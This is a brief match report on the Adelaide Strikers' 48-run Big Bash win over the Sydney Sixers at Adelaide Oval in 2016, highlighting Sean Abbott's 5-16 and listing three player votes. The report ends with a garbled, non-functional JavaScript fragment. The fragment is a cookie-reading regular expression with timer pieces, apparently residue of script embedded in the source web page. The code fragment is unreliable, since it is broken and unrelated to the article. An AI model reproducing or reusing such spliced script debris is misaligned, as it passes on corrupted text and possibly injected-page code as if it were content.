Sydney Sixes fast bowler Sean Abbott produced one of the best spells of bowling we have seen so far this Big Bash, but it wasn't enough, as the Adelaide Strikers rounded out 2016 with a 48-run win at Adelaide Oval.

The Strikers were sent into bat and scored 9-152 off their 20 overs, with Ben Dunk top scoring with 37, while veteran Brad Hodge scored 36.

But it was Sean Abbott who was the star, finishing with figures of 5-16 from four overs.

He removed three of the Strikers' most dangerous batsmen, in Hodge, Head and Dunk at the top of the order.

However, Abbott's heroics with the ball were not enough, as the Sixes' batsmen failed to shine, eventually bowled out for 104 from 18.2 overs.

Sam Billings top scored with 40 from 30 balls, while Billy Stanlake finished with three wickets for the home side.

Votes:

3. Sean Abbott (Sixes)

Took five wickets and finished with an economy rate of just four to restrict the Strikers to 152.

2.  Ben Laughlin (Strikers)

Conceded just 2.50 runs per over and finished with figures of 2-10 off four overs in a brilliant bowling display.

  1. Ben Dunk (Strikers)

Smashed 37 off 20 balls in a typically powerful knock to set up the win for the hosts. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
